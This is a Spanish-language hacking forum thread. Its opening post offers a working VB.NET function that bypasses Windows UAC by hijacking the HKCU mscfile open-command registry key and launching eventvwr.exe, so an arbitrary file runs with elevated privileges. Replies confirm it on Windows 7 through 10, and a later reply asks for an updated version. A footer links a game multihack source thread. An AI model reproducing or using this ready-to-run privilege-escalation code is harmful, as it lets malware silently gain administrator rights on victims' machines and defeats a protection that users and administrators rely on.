comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[VB.NET] Bypass UAC

  • 5 Respuestas
  • 4619 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado fudmario

  • *
  • Cramel
  • *
  • Mensajes: 194
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
    • fudmario - GitHub
  • Skype: fudmario
« en: Noviembre 04, 2016, 12:59:52 am »
Código: vb.net
  1. Public Sub Bypass_UAC(ByVal filepath As String)
  2.             'Based: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
  3.             Using regkey As RegistryKey = Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command")
  4.                 regkey.SetValue("", filepath, RegistryValueKind.String)
  5.             End Using
  6.             Process.Start("eventvwr.exe")
  7.         End Sub
  8.  


Update:
Change : OpenSubKey ---> CreateSubKey
« Última modificación: Noviembre 08, 2016, 02:38:33 pm por fudmario »


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 636
  • Actividad:
    6.67%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #1 en: Noviembre 04, 2016, 08:54:50 am »
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   DOORS.PARTY

Desconectado grep

  • *
  • Underc0der
  • Mensajes: 178
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
    • Grep's personal site
« Respuesta #2 en: Noviembre 04, 2016, 11:37:38 am »
Esto realmente funciona? para que SOs?

Citar
This technique has been tested on Windows 7 and Windows 10, but is expected to work on all versions of Windows that implement UAC.

fuente:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

Saludos

Desconectado fudmario

  • *
  • Cramel
  • *
  • Mensajes: 194
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
    • fudmario - GitHub
  • Skype: fudmario
« Respuesta #3 en: Noviembre 04, 2016, 12:06:16 pm »
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
Win7, Win8, Win8.1 y Win10 (x86 - x64).
Aunque si se modifica el Control de Cuentas de Usuario se puede bloquear esto.


Desconectado sadfud

  • *
  • Moderador
  • Mensajes: 181
  • Actividad:
    1.67%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #4 en: Noviembre 04, 2016, 01:13:52 pm »
Si, si funciona, es mas, esto se le notifico a microsoft ( como pone en el blog de enigma) y no parece que les importe demasiado.

Gracias por la implementacion
Si necesitas ayuda, no dudes en mandar MP

Desconectado jbroken

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Febrero 03, 2018, 05:15:59 pm »

unfortunately this method does not work anymore  >:(. is there any updated system?
maybe an example code would be ideal

 

¿Te gustó el post? COMPARTILO!



[SOURCE-CODE] Point Blank MultiHack . Incluye Bypass al X-trap

Iniciado por Aincrad

Respuestas: 0
Vistas: 602
Último mensaje Junio 01, 2018, 09:00:39 pm
por Aincrad